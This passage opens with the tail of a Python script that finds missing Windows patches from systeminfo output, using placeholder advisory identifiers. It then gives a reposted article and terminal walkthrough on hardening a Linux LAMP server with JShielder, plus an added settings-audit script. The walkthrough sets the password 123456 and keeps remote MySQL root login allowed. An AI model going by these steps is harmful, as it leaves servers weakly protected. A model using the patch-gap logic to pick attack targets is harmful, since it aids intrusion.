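                           [03]: KB4000003
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Ethernet Adapter
"""

# Constructed advisory table with placeholder identifiers. WES-NG ships its own
# definitions.zip; the real CVE/KB mapping is deliberately not reproduced here.
ADVISORIES = [
    {"id": "CVE-EXAMPLE-0001", "builds": {"17763"}, "fixed_by": {"KB4000002", "KB4000009"}},
    {"id": "CVE-EXAMPLE-0002", "builds": {"17763"}, "fixed_by": {"KB4000010"}},
    {"id": "CVE-EXAMPLE-0003", "builds": {"17134"}, "fixed_by": {"KB4000011"}},
]

# "Field name:   value" starts at column 0; continuation lines are indented.
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z0-9() /-]*?):\s*(.*)$")
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text):
    """Extract OS name, version, build, architecture and installed KBs from systeminfo output."""
    fields, hotfixes, current = {}, [], None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw[0].isspace():              # start of a new top-level field
            m = FIELD_RE.match(raw)
            if m:
                current = m.group(1).strip()
                fields[current] = m.group(2).strip()
            else:
                current = None
        elif current == "Hotfix(s)":          # indented "[nn]: KBxxxxxxx" lines
            m = KB_RE.search(raw)
            if m:
                hotfixes.append(m.group(1))
    version = fields.get("OS Version", "")
    ver = re.match(r"(\d+\.\d+\.\d+)", version)
    build = re.search(r"Build (\d+)", version)
    system_type = fields.get("System Type", "").lower()
    arch = "arm64" if "arm64" in system_type else "x64" if "x64" in system_type else "x86"
    return {
        "os_name": fields.get("OS Name", ""),
        "version": ver.group(1) if ver else "",
        "build": build.group(1) if build else "",
        "arch": arch,
        "hotfixes": sorted(set(hotfixes)),
    }


def unpatched(info, advisories=ADVISORIES):
    """Advisory ids that apply to this build and whose fixing KB is not installed.
    Simplification: a later KB that supersedes the listed fix is not recognised."""
    installed = set(info["hotfixes"])
    return [a["id"] for a in advisories
            if info["build"] in a["builds"] and not (a["fixed_by"] & installed)]


if __name__ == "__main__":
    import sys
    # Pass a real systeminfo.txt as the first argument; otherwise the sample is used.
    if len(sys.argv) > 1:
        text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:
        text = SAMPLE_SYSTEMINFO
    info = parse_systeminfo(text)
    print(f"{info['os_name']} {info['version']} build {info['build']} ({info['arch']})")
    print(f"{len(info['hotfixes'])} hotfix(es) installed: {', '.join(info['hotfixes'])}")
    for cve in unpatched(info):
        print("missing fix for", cve)
```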


How to Secure any Linux Server | Automated Server Hardening script
https://www.securitynewspaper.com/2019/07/18/how-to-secure-any-linux-server-automated-server-hardening-script/
Thu, 18 Jul 2019 20:33:17 +0000
https://www.securitynewspaper.com/?p=16068

The post How to Secure any Linux Server | Automated Server Hardening script appeared first on Information Security Newspaper | Hacking News.

There are many open source developers who want to show their skills by developing web applications. Every developer tries to show something new, or to automate their tasks. According to ethical hacking researchers of the International Institute of Cyber Security, there are many phases between developing a web application and deploying it, but infrastructure security should always be the top priority. Every developer checks their application against external attacks, but everything in the development phase should also be done securely, and web applications should be developed securely. We will show a script used to secure, or harden, any Linux server or local web server on which developers will deploy their website.

LAMP

LAMP is an open source software stack used for building web applications. It is also called the LAMP stack because it consists of four layers.

LAMP stands for Linux, Apache, MySQL and PHP. Many developers use LAMP to develop & deploy web applications. JShielder is used to secure the Linux servers on which developers deploy their web applications; it automates the installation of the packages required to host them. In other words, JShielder acts as a server hardening tool (server hardening is the process of enhancing server security). Some common server hardening tips include:

  • Encrypt data in transit.
  • Replace protocols that send sensitive information in plain text.
  • Close unnecessary services running on the server.
  • Keep the OS up to date, especially security patches & malware removal tools.
  • Regularly update security policies.
  • Maintain & regularly check the server logs.

JShielder performs the following configuration steps:

  • Configures a hostname
  • Reconfigures the timezone
  • Updates the entire system
  • Creates a new admin user so you can manage your server safely without making remote connections as root
  • Helps the user generate secure RSA keys, so that remote access to your server is done exclusively from your local PC and with no conventional password
  • Configures, optimizes and secures the SSH server (some settings follow the CIS Benchmark)
  • Configures iptables rules to protect the server from common attacks
  • Disables unused filesystems and network protocols
  • Protects the server against brute force attacks by installing and configuring fail2ban
  • Installs and configures Artillery as a honeypot, monitoring, blocking and alerting tool
  • Installs PortSentry
  • Installs, configures and optimizes MySQL
  • Installs the Apache web server
  • Installs, configures and secures PHP
  • Secures Apache via its configuration file and by installing the modules ModSecurity, ModEvasive, Qos and SpamHaus
  • Secures NginX by installing the ModSecurity NginX module
  • Installs RootKit Hunter
  • Secures the root home and GRUB configuration files
  • Installs Unhide to help detect malicious hidden processes
  • Installs Tiger, a security auditing and intrusion prevention system
  • Restricts access to the Apache config files
  • Disables compilers
  • Creates a daily cron job for system updates
  • Kernel hardening via a (tweaked) sysctl configuration file
  • /tmp directory hardening
  • PSAD IDS installation
  • Enables process accounting
  • Enables unattended upgrades
  • Sets the MOTD and banners warning against unauthorized access
  • Disables USB support for improved security (optional)
  • Configures a restrictive default UMASK
  • Configures and enables auditd
  • Configures auditd rules following the CIS Benchmark
  • Installs sysstat
  • Installs ArpWatch
  • Additional hardening steps following the CIS Benchmark
  • Secures cron
  • Automates the process of setting a GRUB bootloader password
  • Secures boot settings
  • Sets secure file permissions for critical system files

According to ethical hacking researchers of the International Institute of Cyber Security, all the above points are needed by network administrators to secure their servers.
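As an added example (not JShielder's own code), here is a small Python post-hardening check for a few of the settings the list above describes and the walkthrough below applies: the restrictive UMASK, the SSH daemon options, the disabled filesystem and network protocol modules, and sysctl kernel settings. The expected values are CIS-style choices assumed for this example (apart from UMASK 027, the page does not state the exact values JShielder writes), and the configuration snippets are constructed so the script runs offline; audit_host() runs the same checks against the real files.

```python
import glob
import re

# Expected values: CIS-style choices assumed for this example. UMASK 027 is the
# value the script sets; the other values are not taken from JShielder itself.
EXPECTED_UMASK = "027"
EXPECTED_SSHD = {"permitrootlogin": "no", "passwordauthentication": "no",
                 "x11forwarding": "no", "maxauthtries": "4"}
EXPECTED_SYSCTL = {"net.ipv4.ip_forward": "0",
                   "net.ipv4.conf.all.accept_redirects": "0",
                   "kernel.randomize_va_space": "2"}
UNUSED_FILESYSTEMS = ["cramfs", "freevxfs", "jffs2", "hfs", "hfsplus", "udf"]
UNCOMMON_PROTOCOLS = ["dccp", "sctp", "rds", "tipc"]

# Constructed configuration snippets (not captured from a real server): a
# stock-looking set and a hardened set, each ordered as
# (login.defs, sshd_config, modprobe.d contents, sysctl.conf).
STOCK_FILES = (
    "UMASK\t\t022\n",
    "#PermitRootLogin prohibit-password\n#PasswordAuthentication yes\nX11Forwarding yes\n",
    "",
    "# nothing pinned\n",
)
HARDENED_FILES = (
    "UMASK\t\t027\n",
    "PermitRootLogin no\nPasswordAuthentication no\nX11Forwarding no\nMaxAuthTries 4\n",
    "".join(f"install {m} /bin/true\n" for m in UNUSED_FILESYSTEMS + UNCOMMON_PROTOCOLS),
    "net.ipv4.ip_forward = 0\nnet.ipv4.conf.all.accept_redirects = 0\nkernel.randomize_va_space = 2\n",
)


def parse_kv(text):
    """'key value' or 'key = value' lines -> {key_lower: value}; comments dropped, last wins."""
    out = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) == 2:
            out[parts[0].lower()] = parts[1].strip()
    return out


def disabled_modules(modprobe_text):
    """Modules whose loading is neutralised by 'install <module> /bin/true' (or /bin/false)."""
    found = set()
    for raw in modprobe_text.splitlines():
        words = raw.split("#", 1)[0].split()
        if len(words) == 3 and words[0] == "install" and words[2] in ("/bin/true", "/bin/false"):
            found.add(words[1])
    return found


def audit(login_defs, sshd_config, modprobe_conf, sysctl_conf):
    """Return (check, passed, observed) tuples. An absent directive counts as not
    hardened, even where the compiled-in default happens to match."""
    results = []
    umask = parse_kv(login_defs).get("umask")
    results.append(("login.defs UMASK " + EXPECTED_UMASK, umask == EXPECTED_UMASK, umask))
    sshd = parse_kv(sshd_config)
    for key, want in EXPECTED_SSHD.items():
        results.append((f"sshd {key} {want}", sshd.get(key) == want, sshd.get(key)))
    off = disabled_modules(modprobe_conf)
    for mod in UNUSED_FILESYSTEMS + UNCOMMON_PROTOCOLS:
        results.append((f"module {mod} disabled", mod in off, mod in off))
    sysctl = parse_kv(sysctl_conf)
    for key, want in EXPECTED_SYSCTL.items():
        results.append((f"sysctl {key} {want}", sysctl.get(key) == want, sysctl.get(key)))
    return results


def failed_checks(results):
    return [name for name, ok, _ in results if not ok]


def audit_host():
    """Run the same checks against the live files of the machine this runs on."""
    def read(path):
        try:
            return open(path, encoding="utf-8", errors="replace").read()
        except OSError:
            return ""
    modprobe = "".join(read(p) for p in sorted(glob.glob("/etc/modprobe.d/*.conf")))
    sysctl = read("/etc/sysctl.conf") + "".join(read(p) for p in sorted(glob.glob("/etc/sysctl.d/*.conf")))
    return audit(read("/etc/login.defs"), read("/etc/ssh/sshd_config"), modprobe, sysctl)


if __name__ == "__main__":
    for label, files in (("stock sample", STOCK_FILES), ("hardened sample", HARDENED_FILES)):
        results = audit(*files)
        bad = failed_checks(results)
        print(f"{label}: {len(bad)} of {len(results)} checks failed")
        for name in bad:
            print("  FAIL", name)
```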

JShielder Installation:

  • For testing we will use Ubuntu 18.04 LTS. Before using JShielder, LAMP must be installed & configured on your Linux system. LAMP is the Linux counterpart of XAMPP, which is mostly used on Windows OS.
  • To install LAMP, open a terminal and type sudo apt-get update. To install MySQL, type sudo apt-get install mysql-server mysql-client
root@ubuntu:/home/iicybersecurity# sudo apt-get update
 Hit:1 https://security.ubuntu.com/ubuntu bionic-security InRelease
 Hit:2 https://us.archive.ubuntu.com/ubuntu bionic InRelease
 Hit:3 https://us.archive.ubuntu.com/ubuntu bionic-updates InRelease
 Hit:4 https://us.archive.ubuntu.com/ubuntu bionic-backports InRelease
 Reading package lists… Done
root@ubuntu:/home/iicybersecurity# sudo apt-get install mysql-server
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   libaio1 libevent-core-2.1-6 libhtml-template-perl mysql-client-5.7 mysql-client-core-5.7 mysql-server-5.7
   mysql-server-core-5.7
 Suggested packages:
   libipc-sharedcache-perl mailx tinyca
 The following NEW packages will be installed:
   libaio1 libevent-core-2.1-6 libhtml-template-perl mysql-client-5.7 mysql-client-core-5.7 mysql-server mysql-server-5.7
   mysql-server-core-5.7
  • For installing apache type sudo apt-get install apache2 apache2-doc apache2-utils libexpat1 ssl-cert
root@ubuntu:/home/iicybersecurity# sudo apt-get install apache2 apache2-doc apache2-utils libexpat1 ssl-cert
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 ssl-cert is already the newest version (1.0.39).
 libexpat1 is already the newest version (2.2.5-3ubuntu0.1).
 The following additional packages will be installed:
   apache2-bin apache2-data libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap liblua5.2-0
 Suggested packages:
   apache2-suexec-pristine | apache2-suexec-custom
 The following NEW packages will be installed:
   apache2 apache2-bin apache2-data apache2-doc apache2-utils libapr1 libaprutil1 libaprutil1-dbd-sqlite3
   libaprutil1-ldap liblua5.2-0
  • To install PHP, type sudo apt-get install php && sudo apt-get install phpmyadmin. This command will ask you to reconfigure the web server; select apache, and then it will ask you to set a password for MySQL. Enter a secure password & all the dependencies will be configured. The password should be highly secure, as is always communicated in the day one class of the International Institute of Cyber Security (IICS, iiCyberSecurity).
root@ubuntu:/home/iicybersecurity# sudo apt-get install php
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   libapache2-mod-php7.2 php-common php7.2 php7.2-cli php7.2-common php7.2-json php7.2-opcache php7.2-readline
 Suggested packages:
   php-pear
 The following NEW packages will be installed:
   libapache2-mod-php7.2 php php-common php7.2 php7.2-cli php7.2-common php7.2-json php7.2-opcache php7.2-readline
 0 upgraded, 9 newly installed, 0 to remove and 387 not upgraded.
 Need to get 3,863 kB of archives.
root@ubuntu:/home/iicybersecurity# sudo apt-get install phpmyadmin
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   dbconfig-common dbconfig-mysql libjs-sphinxdoc libzip4 php-bz2 php-curl php-gd php-mbstring php-mysql php-pear
   php-php-gettext php-phpseclib php-tcpdf php-xml php-zip php7.2-bz2 php7.2-curl php7.2-gd php7.2-mbstring php7.2-mysql
   php7.2-xml php7.2-zip
 Suggested packages:
   php-libsodium php-mcrypt php-gmp php-imagick
 The following NEW packages will be installed:
   dbconfig-common dbconfig-mysql libjs-sphinxdoc libzip4 php-bz2 php-curl php-gd php-mbstring php-mysql php-pear
   php-php-gettext php-phpseclib php-tcpdf php-xml php-zip php7.2-bz2 php7.2-curl php7.2-gd php7.2-mbstring php7.2-mysql
   php7.2-xml php7.2-zip phpmyadmin
  • Now type git clone https://github.com/Jsitech/JShielder.git
root@ubuntu:/home/iicybersecurity/Downloads# git clone https://github.com/Jsitech/JShielder.git
 Cloning into 'JShielder'…
 remote: Enumerating objects: 70, done.
 remote: Counting objects: 100% (70/70), done.
 remote: Compressing objects: 100% (44/44), done.
 remote: Total 1192 (delta 48), reused 46 (delta 26), pack-reused 1122
 Receiving objects: 100% (1192/1192), 1.09 MiB | 764.00 KiB/s, done.
 Resolving deltas: 100% (624/624), done.
  • Then type cd JShielder && ls. JShielder is developed as a bash script.
root@ubuntu:/home/iicybersecurity# cd Downloads/JShielder/
root@ubuntu:/home/iicybersecurity/Downloads/JShielder# ls
 'CentOS_7(Under Development)'   jshielder.sh   LICENSE   README.md   UbuntuServer_16.04LTS   UbuntuServer_18.04LTS
  • Type ./jshielder.sh
root@myserver1:/home/iicybersecurity/Downloads/JShielder# ./jshielder.sh
     ██╗███████╗██╗  ██╗██╗███████╗██╗     ██████╗ ███████╗██████╗
     ██║██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗██╔════╝██╔══██╗
     ██║███████╗███████║██║█████╗  ██║     ██║  ██║█████╗  ██████╔╝
██   ██║╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║██╔══╝  ██╔══██╗
╚█████╔╝███████║██║  ██║██║███████╗███████╗██████╔╝███████╗██║  ██║
╚════╝ ╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝ ╚══════╝╚═╝  ╚═╝

Automated Hardening Script for Linux Servers
Developed By Jason Soto @JsiTech
---------------------------------------------------------------------------------------------------------
[+] SELECT YOUR LINUX DISTRIBUTION
---------------------------------------------------------------------------------------------------------

1. Ubuntu Server 16.04 LTS
2. Ubuntu Server 18.04 LTS
3. Linux CentOS 7 (Coming Soon)
4. Debian GNU/Linux 8 (Coming Soon)
5. Debian GNU/Linux 9 (Coming Soon)
6. Red Hat Linux 7 (Coming Soon)
7. Exit

2
  • Type 2
[+] SELECT THE DESIRED OPTION
1. LAMP Deployment
2. LEMP Deployment
3. Reverse Proxy Deployment With Apache
4. Running With SecureWPDeployer or JSDeployer Script
5. Customized Run (Only run desired Options)
6. CIS Benchmark Hardening
Exit
 
1
  • Type 1
[+] Setting some Prerequisites
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]'universe' distribution component is already enabled for all sources.
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will report that the 'universe' distribution component is enabled. Press Enter to continue configuring.
  • Enter Y & type mysql1
  • And then enter www.testsite1.com
¿Do you Wish to Set a HostName? (y/n): y
Type a Name to Identify this server :
  (For Example: myserver): mysql1
¿Type Domain Name?:www.testsite1.com

Creating legal Banners for unauthorized access
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then configure timezone.
[+] We will now Configure the TimeZone
 Current default time zone: 'America/Los_Angeles'
  • Then select country.
[+] We will now Configure the TimeZone
 Current default time zone: 'America/Los_Angeles'
 Local time is now:      Wed Jul 17 22:31:34 PDT 2019.
 Universal Time is now:  Thu Jul 18 05:31:34 UTC 2019.
 Done.

  To EXIT Press x Key, Press ENTER to Continue
  • Then the server will run an update. This command searches for available updates for the system & installs the required updates.
  • It might take time depending on your internet speed.
[+] Updating the System
 Hit:1 https://security.ubuntu.com/ubuntu bionic-security InRelease
 Hit:2 https://us.archive.ubuntu.com/ubuntu bionic InRelease
 Hit:3 https://us.archive.ubuntu.com/ubuntu bionic-updates InRelease
 Hit:4 https://us.archive.ubuntu.com/ubuntu bionic-backports InRelease
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 387 packages can be upgraded. Run 'apt list --upgradable' to see them.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 Calculating upgrade… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   gstreamer1.0-gtk3 libllvm8 linux-headers-4.18.0-25 linux-headers-4.18.0-25-generic linux-image-4.18.0-25-generic
   linux-modules-4.18.0-25-generic linux-modules-extra-4.18.0-25-generic python3-dateutil
 The following packages will be upgraded:

apport apport-gtk apt apt-utils aptdaemon aptdaemon-data bash bind9-host binutils binutils-common
   binutils-x86-64-linux-gnu busybox-initramfs busybox-static bzip2 console-setup console-setup-linux cpp cups

Done.
  To EXIT Press x Key, Press ENTER to Continue
  • After installing updates press enter.
 [+] Setting UMASK to a more Restrictive Value (027)
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]
 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Now JShielder will enhance security by blocking or disabling unnecessary components of system.
 [+] Disabling Unused FileSystems
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Now JShielder will disable uncommon network protocols to reduce what can be discovered by scanning from external sources, as used in the ethical hacking phases of pentesting.
[+] Disabling Uncommon Network Protocols
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Create new user. Enter username & password
  • Enter username testuser1 & password 123456
  • Enter y
[+] We will now Create a New User
Type the new username: testuser1
 Adding user `testuser1' ...
 Adding new group `testuser1' (1001) ...
 Adding new user `testuser1' (1001) with group `testuser1' ...
 Creating home directory `/home/testuser1' ...
 Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
 passwd: password updated successfully
 Changing the user information for testuser1
 Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:     
        Work Phone []:     
        Home Phone   []:     
        Other []:
 Is the information correct? [Y/n] y

Done.
  To EXIT Press x Key, Press ENTER to Continue

[+] Instructions to Generate an RSA KEY PAIR
 *** IF YOU DONT HAVE A PUBLIC RSA KEY, GENERATE ONE ***
      Follow the Instruction and Hit Enter When Done
      To receive a new Instruction
 RUN THE FOLLOWING COMMANDS  a) ssh-keygen -t rsa -b 4096
  • Copy & paste the above command into the same terminal & hit Enter.
 ssh-keygen -t rsa -b 4096 

 b) cat /home/testuser1/.ssh/id_rsa.pub >> /home/testuser1/.ssh/authorized_keys
 Done.
  To EXIT Press x Key, Press ENTER to Continue

Run the Following Command to copy the Key
  Press ENTER when done
  ssh-copy-id -i /root/.ssh/id_rsa.pub testuser1@192.168.1.11
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Securing SSH
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 chattr: No such file or directory while trying to stat /home/testuser1/.ssh/authorized_keys
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • SSH will now be secured and the iptables rules set. Then it will install Fail2ban, which works as an intrusion prevention system whose main purpose is to protect against brute force attacks.
[+] Setting IPTABLE RULES
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
 Done.
  To EXIT Press x Key, Press ENTER to Continue

[+] Installing Fail2Ban
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   liblockfile-bin liblockfile1 lockfile-progs procmail sendmail-base sendmail-bin sendmail-cf sensible-mda
 Suggested packages:
   sendmail-doc rmail logcheck resolvconf sasl2-bin
 The following NEW packages will be installed:
   liblockfile-bin liblockfile1 lockfile-progs procmail sendmail sendmail-base sendmail-bin sendmail-cf sensible-mda
 0 upgraded, 9 newly installed, 0 to remove and 1 not upgraded.
 374 not fully installed or removed.
 Need to get 899 kB of archives.
 After this operation, 4,449 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y
  • Then it will install python3-pyinotify; enter Y to install the Python dependency.
Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   python3-pyinotify whois
 Suggested packages:
   mailx monit sqlite3 python-pyinotify-doc
 The following NEW packages will be installed:
   fail2ban python3-pyinotify whois
 0 upgraded, 3 newly installed, 0 to remove and 1 not upgraded.
 Need to get 398 kB of archives.
 After this operation, 2,110 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 fail2ban all 0.10.2-2 [329 kB]

Created symlink /etc/systemd/system/multi-user.target.wants/fail2ban.service → /lib/systemd/system/fail2ban.service.
 Processing triggers for ureadahead (0.100.0-21) …
 Setting up whois (5.3.0) …
 Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up python3-pyinotify (0.9.6-1) …
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will install MySQL.
[+] Installing, Configuring and Optimizing MySQL
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 mysql-server is already the newest version (5.7.26-0ubuntu0.18.04.1).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] OK
 Securing the MySQL server deployment.

 Connecting to MySQL using a blank password.

 VALIDATE PASSWORD PLUGIN can be used to test passwords
 and improve security. It checks the strength of password
 and allows the users to set only those passwords which are
 secure enough. Would you like to setup VALIDATE PASSWORD plugin?

 Press y|Y for Yes, any other key for No:y
  • Choose the password policy. Enter 1
There are three levels of password validation policy:
 LOW    Length >= 8
 MEDIUM Length >= 8, numeric, mixed case, and special characters
 STRONG Length >= 8, numeric, mixed case, special characters and dictionary file
 Please enter 0 = LOW, 1 = MEDIUM and 2 = STRONG: 1

New password:

Re-enter new password:

Estimated strength of the password: 100
 Do you wish to continue with the password provided?(Press y|Y for Yes, any other key for No) :y
  • Enter y to remove the anonymous user and enhance the security of MySQL. This restricts anonymous login to MySQL. As per digital forensics experts of iicybersecurity, some DB admins leave anonymous login enabled, which further helps attacks.
 By default, a MySQL installation has an anonymous user,
 allowing anyone to log into MySQL without having to have
 a user account created for them. This is intended only for
 testing, and to make the installation go a bit smoother.
 You should remove them before moving into a production
 environment.
 Remove anonymous users? (Press y|Y for Yes, any other key for No) :y
  • Whether to allow remote root access depends entirely on your requirements. Here we enter n.
 Normally, root should only be allowed to connect from
 'localhost'. This ensures that someone cannot guess at
 the root password from the network.
 Disallow root login remotely? (Press y|Y for Yes, any other key for No): n 
  • Remove the test database which comes with MySQL by default. Enter y.
By default, MySQL comes with a database named 'test' that
 anyone can access. This is also intended only for testing,
 and should be removed before moving into a production
 environment.
 Remove test database and access to it? (Press y|Y for Yes, any other key for No) : y

 Dropping test database…
 Success.

 Removing privileges on test database…
 Success. 

 Reloading the privilege tables will ensure that all changes
 made so far will take effect immediately.
 Reload privilege tables now? (Press y|Y for Yes, any other key for No) :y

Success.
 All done!
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will install the Apache web server.
[+] Installing Apache Web Server
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 apache2 is already the newest version (2.4.29-1ubuntu4.7).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will install PHP required files.
[+] Installing, Configuring and Optimizing PHP
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 php is already the newest version (1:7.2+60ubuntu1).
 php-pear is already the newest version (1:1.10.5+submodules+notgz-1ubuntu1.18.04.1).
 php-pear set to manually installed.
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   php-cli
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 3,160 B of archives.
 After this operation, 12.3 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 php-cli all 1:7.2+60ubuntu1 [3,160 B]
 Fetched 3,160 B in 1s (2,978 B/s)

Preparing to unpack …/python-mysqldb_1.3.10-1build1_amd64.deb …
 Unpacking python-mysqldb (1.3.10-1build1) …
 Setting up python-mysqldb (1.3.10-1build1) …
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] OK
  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will install modsecurity.
[+] Installing ModSecurity
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 libxml2 is already the newest version (2.9.4+dfsg1-6.1ubuntu1.2).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   libxml2-dev libxml2-utils
 0 upgraded, 2 newly installed, 0 to remove and 1 not upgraded.
 Need to get 793 kB of archives.
 After this operation, 3,731 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y

Preparing to unpack …/modsecurity-crs_3.0.2-1_all.deb …
 Unpacking modsecurity-crs (3.0.2-1) …
 Setting up modsecurity-crs (3.0.2-1) …
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Setting up liblua5.1-0:amd64 (5.1.5-8.1build2) …
 Setting up libapache2-mod-security2 (2.9.2-1) …
 apache2_invoke: Enable module security2
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • After that, run the command shown to restart apache2.
[+] Setting UP OWASP Rules for ModSecurity
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]OK
 Enabling module headers.
 To activate the new configuration, you need to run:
   systemctl restart apache2
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Optimizing Apache
 -- Enabling ModRewrite
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]Enabling module rewrite.
 To activate the new configuration, you need to run:
   systemctl restart apache2
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Enter email id to receive alerts.
[+] Installing ModEvasive
 Type Email to Receive Alerts testemail.com
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   bsd-mailx
 The following NEW packages will be installed:
   bsd-mailx libapache2-mod-evasive
 0 upgraded, 2 newly installed, 0 to remove and 1 not upgraded.
 Need to get 80.5 kB of archives.
 After this operation, 256 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 bsd-mailx amd64 8.1.2-0.20160123cvs-4 [66.0 kB]
 Get:2 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 libapache2-mod-evasive amd64 1.10.1-3 [1

Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up libapache2-mod-evasive (1.10.1-3) …
 apache2_invoke: Enable module evasive
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Install Mod_Qos
[+] Installing Mod_Qos/Spamhaus
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   libapache2-mod-qos
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 202 kB of archives.
 After this operation, 744 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 libapache2-mod-qos amd64 11.44-1build1 [202 kB]
 Fetched 202 kB in 3s (80.2 kB/s)
 Selecting previously unselected package libapache2-mod-qos

Building dependency tree
 Reading state information… Done
 E: Unable to locate package libapache2-mod-spamhaus
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will configure Fail2ban
[+] Configuring Fail2Ban
 Configuring Fail2Ban……
 [ ok ++++++++++++++++++++++++++++++++++++++++++++++++++   ][….] Restarting fail2ban (via systemctl): fail2ban.service.
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Install additional packages.
[+] Installing Additional Packages
 Install tree………….
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   tree
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 40.7 kB of archives.
 After this operation, 105 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 tree amd64 1.7.0-5 [40.7 kB]
 Fetched 40.7 kB in 2s (24.3 kB/s)
 Selecting previously unselected package tree.
 (Reading database … 228842 files and directories currently installed.)
 Preparing to unpack …/tree_1.7.0-5_amd64.deb …
 Unpacking tree (1.7.0-5) …
 Setting up tree (1.7.0-5) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

Setting up apt-show-versions (0.22.7ubuntu1) …
 ** initializing cache. This may take a while **
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Install PHPUnit……….
 config-set succeeded
 Done.
  To EXIT Press x Key, Press ENTER to Continue
